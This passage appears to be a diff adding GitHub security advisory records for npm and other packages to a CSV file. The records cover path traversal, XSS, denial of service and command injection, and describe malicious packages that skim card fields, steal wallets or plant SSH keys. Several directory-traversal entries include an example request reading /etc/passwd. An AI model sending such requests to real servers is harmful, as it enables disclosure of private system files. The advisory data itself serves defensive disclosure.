'https://github.com/tensorflow/tensorflow/commit/46d5b0852528ddfd614ded79bccc75589f801bd9'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/cd31fd0ce0449a9e0f83dcad08d6ed7f1d6bef3f'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/e11f55585f614645b360563072ffeb5c3eeff162'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/fff2c8326280c07733828f990548979bdc893859'}, {'type': 'PACKAGE', 'url': 'https://github.com/tensorflow/tensorflow'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/releases/tag/v2.3.1'}, {'type': 'WEB', 'url': 'http://lists.opensuse.org/opensuse-security-announce/2020-10/msg00065.html'}]","{'cwe_ids': ['CWE-125', 'CWE-787'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-09-25T18:13:16Z', 'nvd_published_at': '2020-09-25T19:15:00Z'}"
+1.4.0,GHSA-crf7-fvjx-863q,2020-08-31T18:44:37Z,2020-09-03T17:09:26Z,,[],Path Traversal in zero,"Versions of `zero` prior to 1.0.6 are vulnerable to Path Traversal. Due to insufficient input sanitization in URLs, attackers can access server files by using relative paths when fetching files.
+
+
+## Recommendation
+
+Upgrade to version 1.0.6 or later.
+",[],"[{'package': {'ecosystem': 'npm', 'name': 'zero'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.0.6'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1025'}]","{'cwe_ids': ['CWE-22'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:44:37Z', 'nvd_published_at': None}"
+1.4.0,GHSA-c2g6-57fp-22wp,2021-09-30T16:14:29Z,2020-09-03T22:48:35Z,,[],Malicious Package in fuffer-xor,"Version 2.0.2 contained malicious code. The package targeted the Ethereum cryptocurrency and performed transactions to wallets not controlled by the user.
+
+
+## Recommendation
+
+Remove the package from your environment. Ensure no Ethereum funds were compromised.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'fuffer-xor'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1271'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:53:15Z', 'nvd_published_at': None}"
+1.4.0,GHSA-4j54-mmmv-hjpm,2023-07-27T20:05:27Z,2020-09-03T19:17:51Z,,[],Malicious Package in slush-fullstack-framework,"Version 0.9.2 of `slush-fullstack-framework` contained malicious code. The code when executed in the browser would enumerate password, cvc, cardnumber fields from forms and send the extracted values to `https://js-metrics.com/minjs.php?pl=`
+
+
+
+## Recommendation
+
+Remove the package from your environment. It's also recommended to evaluate your application to determine whether or not user data was compromised.
+
+Users may consider downgrading to version 0.9.1",[],"[{'package': {'ecosystem': 'npm', 'name': 'slush-fullstack-framework'}, 'versions': ['0.9.2']}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1108'}]","{'cwe_ids': [], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:47:33Z', 'nvd_published_at': None}"
+1.4.0,GHSA-33gc-f8v9-v8hm,2021-10-01T13:27:36Z,2020-09-01T20:41:40Z,,[],Malicious Package in ladder-text-js,"`ladder-text-js` contained a malicious script that attempted to delete all files when `npm test` was run.
+
+
+
+## Recommendation
+
+This module has been unpublished from the npm Registry. If you find this module in your environment remove it.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'ladder-text-js'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/651'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:31:21Z', 'nvd_published_at': None}"
+1.4.0,GHSA-mxmj-84q8-34r7,2020-08-31T18:41:47Z,2020-09-03T02:39:49Z,,[],Command Injection in expressfs,"All versions of `expressfs` are vulnerable to Command Injection. The package does not validate user input on several API endpoints, allowing attackers to run arbitrary commands in the system. The affected endpoints are: `expressfs.appendFile`, `expressfs.cp`, `expressfs.create` and `expressfs.rmdir`.
+
+
+## Recommendation
+
+No fix is currently available. Consider using an alternative module until a fix is made available.",[],"[{'package': {'ecosystem': 'npm', 'name': 'expressfs'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/953'}]","{'cwe_ids': ['CWE-77'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:41:47Z', 'nvd_published_at': None}"
+1.4.0,GHSA-7xc4-793x-25jp,2021-10-01T20:49:13Z,2020-09-04T16:48:38Z,,[],Malicious Package in bpi66,"All versions of this package contained malware. The package was designed to find and exfiltrate cryptocurrency wallets.
+
+
+## Recommendation
+
+Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.
+
+The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'bpi66'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1374'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:56:55Z', 'nvd_published_at': None}"
+1.4.0,GHSA-cr56-66mx-293v,2021-10-04T21:12:14Z,2020-09-03T15:53:50Z,,[],Cross-Site Scripting in @toast-ui/editor,"Versions of `@toast-ui/editor` prior to 2.2.0 are vulnerable to Cross-Site Scripting (XSS). There are multiple bypasses to the package's built-in XSS sanitization. This may allow attackers to execute arbitrary JavaScript on a victim's browser.
+
+## Recommendation
+
+Upgrade to version 2.2.0 or later.",[],"[{'package': {'ecosystem': 'npm', 'name': '@toast-ui/editor'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.2.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/nhn/tui.editor/issues/733'}, {'type': 'WEB', 'url': 'https://github.com/nhn/tui.editor/pull/1010'}, {'type': 'WEB', 'url': 'https://github.com/nhn/tui.editor/commit/5f62f5eeda9e8f8bcf2075e8e0e10d22bf56d1a7'}, {'type': 'PACKAGE', 'url': 'https://github.com/nhn/tui.editor'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1521'}]","{'cwe_ids': ['CWE-79'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T19:02:06Z', 'nvd_published_at': None}"
+1.4.0,GHSA-4pmg-jgm5-3jg6,2021-09-30T21:14:54Z,2020-09-02T21:16:26Z,,[],Malicious Package in erquest,"All versions of `erquest` typosquatted a popular package of similar name and tracked users who had installed the incorrect package. The package uploaded information to a remote server including: name of the downloaded package, name of the intended package, the Node version and whether the process was running as sudo. There is no further compromise.
+
+
+## Recommendation
+
+Remove the package from your dependencies and always ensure package names are typed correctly upon installation.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'erquest'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/871'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:38:54Z', 'nvd_published_at': None}"
+1.4.0,GHSA-2p6g-gjp8-ggg9,2022-09-19T22:53:21Z,2020-09-09T17:29:34Z,,[],personnummer/php vulnerable to Improper Input Validation ,"This vulnerability was reported to the personnummer team in June 2020. The slow response was due to locked ownership of some of the affected packages, which caused delays to update packages prior to disclosure.
+
+The vulnerability is determined to be low severity.
+
+### Impact
+
+This vulnerability impacts users who rely on the for last digits of personnummer to be a _real_ personnummer.
+
+### Patches
+
+The issue have been patched in all repositories. The following versions should be updated to as soon as possible:
+
+[C#](https://github.com/advisories/GHSA-qv8q-v995-72gr) 3.0.2
+D 3.0.1
+[Dart](https://github.com/advisories/GHSA-4xh4-v2pq-jvhm) 3.0.3
+Elixir 3.0.0
+[Go](https://github.com/advisories/GHSA-hv53-vf5m-8q94) 3.0.1
+[Java](https://github.com/advisories/GHSA-q3vw-4jx3-rrr2) 3.3.0
+[JavaScript](https://github.com/advisories/GHSA-vpgc-7h78-gx8f) 3.1.0
+Kotlin 1.1.0
+Lua 3.0.1
+[PHP](https://github.com/advisories/GHSA-2p6g-gjp8-ggg9) 3.0.2
+Perl 3.0.0
+[Python](https://github.com/advisories/GHSA-rxq3-5249-8hgg) 3.0.2
+[Ruby](https://github.com/advisories/GHSA-vp9c-fpxx-744v) 3.0.1
+[Rust](https://github.com/advisories/GHSA-28r9-pq4c-wp3c) 3.0.0
+Scala 3.0.1
+Swift 1.0.1
+
+If you are using any of the earlier packages, please update to latest.
+
+### Workarounds
+
+The issue arrieses from the regular expression allowing the first three digits in the last four digits of the personnummer to be
+000, which is invalid. To mitigate this without upgrading, a check on the last four digits can be made to make sure it's not
+000x.
+
+### For more information
+
+If you have any questions or comments about this advisory:
+* Open an issue in [Personnummer Meta](https://github.com/personnummer/meta/issues)
+* Email us at [Personnummer Email](mailto:security@personnummer.dev)",[],"[{'package': {'ecosystem': 'Packagist', 'name': 'personnummer/personnummer'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.0.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/personnummer/php/security/advisories/GHSA-2p6g-gjp8-ggg9'}, {'type': 'WEB', 'url': 'https://github.com/personnummer/php/commit/3d22e5316d8546ac939e7818cd69118f874152ab'}, {'type': 'PACKAGE', 'url': 'https://github.com/personnummer/php/'}, {'type': 'WEB', 'url': 'https://packagist.org/packages/personnummer/personnummer'}]","{'cwe_ids': [], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2020-09-04T16:44:21Z', 'nvd_published_at': None}"
+1.4.0,GHSA-m9r7-q9fc-qwx5,2021-09-30T17:43:47Z,2020-09-03T17:22:24Z,,[],Malicious Package in maybemaliciouspackage,"All versions of `maybemaliciouspackage` contain malicious code. The package prints the system's SSH keys to the console as a postinstall script.
+
+
+## Recommendation
+
+Remove the package from your environment. There are no further signs of compromise.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'maybemaliciouspackage'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1042'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:45:10Z', 'nvd_published_at': None}"
+1.4.0,GHSA-2958-5r4r-wvv6,2023-09-13T23:06:21Z,2020-09-01T17:27:05Z,,['CVE-2017-16159'],Directory Traversal in caolilinode,"Affected versions of `caolilinode` resolve relative file paths, resulting in a directory traversal vulnerability. A malicious actor can use this vulnerability to access files outside of the intended directory root, which may result in the disclosure of private files on the vulnerable system.
+
+**Example request:**
+```http
+GET /../../../../../../../../../../etc/passwd HTTP/1.1
+host:foo
+```
+
+
+## Recommendation
+
+No patch is available for this vulnerability.
+
+It is recommended that the package is only used for local development, and if the functionality is needed for production, a different package is used instead.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'caolilinode'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2017-16159'}, {'type': 'WEB', 'url': 'https://github.com/JacksonGL/NPM-Vuln-PoC/blob/master/directory-traversal/caolilinode'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/394'}]","{'cwe_ids': ['CWE-22'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:21:39Z', 'nvd_published_at': None}"
+1.4.0,GHSA-8qm2-24qc-c4qg,2021-09-24T17:32:50Z,2020-09-01T19:57:56Z,,[],Malicious Package in freshdom,"Version 0.0.6 of `freshdom` contained malicious code. The code when executed in the browser would enumerate password, cvc, cardnumber fields from forms and send the extracted values to `https://js-metrics.com/minjs.php?pl=`
+
+
+
+## Recommendation
+
+If version 0.0.6 of this module is found installed you will want to replace it with a version before or after 0.0.6. In addition to replacing the installed module, you will also want to evaluate your application to determine whether or not user data was compromised.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'freshdom'}, 'versions': ['0.0.6']}]","[{'type': 'PACKAGE', 'url': 'https://github.com/jamiller619/freshdom'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-FRESHDOM-450987'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/627'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:30:26Z', 'nvd_published_at': None}"
+1.4.0,GHSA-qxrj-x7rm-2h49,2021-10-01T21:01:13Z,2020-09-03T17:05:59Z,,[],Malicious Package in dhkey,"All versions of this package contained malware. The package was designed to find and exfiltrate cryptocurrency wallets.
+
+
+## Recommendation
+
+Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.
+
+The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'dhkey'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1394'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:57:41Z', 'nvd_published_at': None}"
+1.4.0,GHSA-whv6-rj84-2vh2,2021-10-04T20:36:41Z,2020-09-04T17:21:58Z,,[],Cross-Site Scripting in nextcloud-vue-collections,"Versions of `nextcloud-vue-collections` prior to 0.4.2 are vulnerable to Cross-Site Scripting (XSS). The `v-tooltip` component has an insecure `defaultHTML` configuration that allows arbitrary JavaScript to be injected in the tooltip of a collection item. This allows attackers to execute arbitrary code in a victim's browser.
+
+
+## Recommendation
+
+Upgrade to version 0.4.2 or later.",[],"[{'package': {'ecosystem': 'npm', 'name': 'nextcloud-vue-collections'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.4.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/juliushaertl/nextcloud-vue-collections/commit/8ec1fca214f003538cec4137792ede928f25f583'}, {'type': 'PACKAGE', 'url': 'https://github.com/juliushaertl/nextcloud-vue-collections'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1442'}]","{'cwe_ids': ['CWE-79'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:59:28Z', 'nvd_published_at': None}"
+1.4.0,GHSA-7g8m-5qh9-9pgw,2023-09-13T20:25:36Z,2020-09-01T18:07:51Z,,['CVE-2017-16220'],Directory Traversal in wind-mvc,"Affected versions of `wind-mvc` resolve relative file paths, resulting in a directory traversal vulnerability. A malicious actor can use this vulnerability to access files outside of the intended directory root, which may result in the disclosure of private files on the vulnerable system.
+
+**Example request:**
+```http
+GET /../../../../../../../../../../etc/passwd HTTP/1.1
+host:foo
+```
+
+
+## Recommendation
+
+No patch is available for this vulnerability.
+
+It is recommended that the package is only used for local development, and if the functionality is needed for production, a different package is used instead.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'wind-mvc'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2017-16220'}, {'type': 'WEB', 'url': 'https://github.com/JacksonGL/NPM-Vuln-PoC/blob/master/directory-traversal/wind-mvc'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/417'}]","{'cwe_ids': ['CWE-22'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:22:20Z', 'nvd_published_at': None}"
+1.4.0,GHSA-hg78-c92r-hvwr,2021-09-23T21:37:37Z,2020-09-01T16:01:24Z,,['CVE-2016-1000242'],Denial of Service in mqtt,"Affected versions of `mqtt` will cause the node process to crash when receiving specially crafted MQTT packets, making the application vulnerable to a denial of service condition.
+
+
+
+## Recommendation
+
+Update to v1.0.0 or later","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'mqtt'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.0.0'}]}], 'database_specific': {'last_known_affected_version_range': '<= 0.3.13'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2016-1000242'}, {'type': 'PACKAGE', 'url': 'https://github.com/mqttjs/MQTT.js'}, {'type': 'WEB', 'url': 'https://github.com/mqttjs/MQTT.js/blob/388a084d7803934b18b43c1146c817deaa1396b1/lib/parse.js#L230'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/npm:mqtt:20160817'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/140'}]","{'cwe_ids': ['CWE-248'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:12:16Z', 'nvd_published_at': None}"
+1.4.0,GHSA-qj3g-wfr7-3cv7,2021-09-30T21:56:11Z,2020-09-02T21:41:53Z,,[],Malicious Package in require-ports,"Version 10.4.0 of `require-ports` contains malicious code as a preinstall script. The package is malware designed to take advantage of users making a mistake when typing the name of a module to install. When installed, the package downloads a file from a remote server, executes it and opens a backdoor.
+
+
+## Recommendation
+
+Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.
+
+The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'require-ports'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/909'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:40:11Z', 'nvd_published_at': None}"
+1.4.0,GHSA-wh87-3959-vfrq,2021-09-29T20:58:37Z,2020-09-03T21:51:58Z,,[],Malicious Package in buffer-hor,"Version 2.0.2 contained malicious code. The package targeted the Ethereum cryptocurrency and performed transactions to wallets not controlled by the user.
+
+
+## Recommendation
+
+Remove the package from your environment. Ensure no Ethereum funds were compromised.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'buffer-hor'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1242'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:52:04Z', 'nvd_published_at': None}"
+1.4.0,GHSA-gfm8-g3vm-53jh,2021-09-30T17:16:55Z,2020-09-03T17:21:19Z,,[],Malicious Package in leetlog,"Versions 0.1.2 and 0.1.3 of `leetlog` contain malicious code. The package adds an arbitrary hardcoded SSH key identified as `hacker@evilmachine` to the system's `authorized_keys`
+
+
+## Recommendation
+
+Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.
+
+The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'leetlog'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.1.2'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1041'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:45:08Z', 'nvd_published_at': None}"
+1.4.0,GHSA-cjj8-wfrx-jqcf,2021-09-23T21:36:34Z,2020-09-01T16:00:18Z,,['CVE-2016-1000241'],Cross-Site Scripting (XSS) in pivottable,"Affected versions of `pivottable` are vulnerable to cross-site scripting, due to a new mechanism used to render JSON elements.
+
+
+## Recommendation
+
+Update to version 2.0.0 or later.",[],"[{'package': {'ecosystem': 'npm', 'name': 'pivottable'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.4.0'}, {'fixed': '2.0.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2016-1000241'}, {'type': 'WEB', 'url': 'https://github.com/nicolaskruchten/pivottable/pull/401'}, {'type': 'PACKAGE', 'url': 'https://github.com/nicolaskruchten/pivottable'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/139'}]","{'cwe_ids': ['CWE-79'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:12:13Z', 'nvd_published_at': None}"
+1.4.0,GHSA-4964-cjrr-jg97,2021-09-30T21:55:10Z,2020-09-02T21:38:43Z,,[],Malicious Package in jqeury,"Version 3.3.1 of `jqeury` contains malicious code as a preinstall script. The package is malware designed to take advantage of users making a mistake when typing the name of a module to install. When installed, the package downloads a file from a remote server, executes it and opened a backdoor.
+
+
+## Recommendation
+
+Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.
+
+The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'jqeury'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/906'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:40:04Z', 'nvd_published_at': None}"
+1.4.0,GHSA-mwj7-r5vc-hmc9,2023-09-11T20:33:44Z,2020-09-01T17:35:38Z,,['CVE-2017-16171'],Directory Traversal in hcbserver,"Affected versions of `hcbserver` resolve relative file paths, resulting in a directory traversal vulnerability. A malicious actor can use this vulnerability to access files outside of the intended directory root, which may result in the disclosure of private files on the vulnerable system.
+
+**Example request:**
+```http
+GET /../../../../../../../../../../etc/passwd HTTP/1.1
+host:foo
+```
+
+
+## Recommendation
+
+No patch is available for this vulnerability.
+
+It is recommended that the package is only used for local development, and if the functionality is needed for production, a different package is used instead.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'hcbserver'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2017-16171'}, {'type': 'WEB', 'url': 'https://github.com/JacksonGL/NPM-Vuln-PoC/blob/master/directory-traversal/hcbserver'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/414'}]","{'cwe_ids': ['CWE-22'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:22:13Z', 'nvd_published_at': None}"
+1.4.0,GHSA-6879-xr95-5gf4,2021-09-30T17:16:35Z,2020-09-03T17:20:15Z,,[],Malicious Package in malicious-do-not-install,"All versions of `malicious-do-not-install` contain malicious code. The package copies the contents of `/etc/passwd` and `/etc/shadow` to files in the local `/tmp/` folder.
+
+
+## Recommendation
+
+Remove the package from your environment and rotate affected credentials.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'malicious-do-not-install'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1040'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:45:05Z', 'nvd_published_at': None}"
+1.4.0,GHSA-mh5c-679w-hh4r,2020-08-31T18:51:01Z,2020-09-03T21:12:01Z,,[],Denial of Service in mongodb,"Versions of `mongodb` prior to 3.1.13 are vulnerable to Denial of Service. The package fails to properly catch an exception when a collection name is invalid and the DB does not exist, crashing the application.
+
+
+## Recommendation
+
+Upgrade to version 3.1.13 or later.",[],"[{'package': {'ecosystem': 'npm', 'name': 'mongodb'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.1.13'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1203'}]","{'cwe_ids': [], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:51:01Z', 'nvd_published_at': None}"
+1.4.0,GHSA-r4m5-47cq-6qg8,2020-08-31T18:59:34Z,2020-09-04T17:25:13Z,,[],Server-Side Request Forgery in ftp-srv,"All versions of `ftp-srv` are vulnerable to Server-Side Request Forgery (SSRF). The package fails to prevent remote clients to access other resources in the network, for example when connecting to the server through telnet. This allows attackers to access any network resources available to the server, including private resources in the hosting environment.
+
+
+## Recommendation
+
+No fix is currently available. Consider using an alternative package until a fix is made available.",[],"[{'package': {'ecosystem': 'npm', 'name': 'ftp-srv'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1445'}]","{'cwe_ids': ['CWE-918'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:59:34Z', 'nvd_published_at': None}"
+1.4.0,GHSA-v3jv-wrf4-5845,2021-09-23T21:38:18Z,2020-09-01T16:03:34Z,,['CVE-2013-4116'],Local Privilege Escalation in npm,"Affected versions of `npm` use predictable temporary file names during archive unpacking. If an attacker can create a symbolic link at the location of one of these temporary file names, the attacker can arbitrarily write to any file that the user which owns the `npm` process has permission to write to, potentially resulting in local privilege escalation.
+
+
+
+## Recommendation
+
+Update to version 1.3.3 or later.",[],"[{'package': {'ecosystem': 'npm', 'name': 'npm'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.3.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2013-4116'}, {'type': 'WEB', 'url': 'https://github.com/npm/npm/issues/3635'}, {'type': 'WEB', 'url': 'https://github.com/npm/npm/commit/f4d31693'}, {'type': 'WEB', 'url': 'https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=715325'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=983917'}, {'type': 'WEB', 'url': 'https://exchange.xforce.ibmcloud.com/vulnerabilities/87141'}, {'type': 'PACKAGE', 'url': 'https://github.com/npm/npm'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/152'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2013/07/10/17'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2013/07/11/9'}, {'type': 'WEB', 'url': 'http://www.securityfocus.com/bid/61083'}]","{'cwe_ids': ['CWE-59'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': 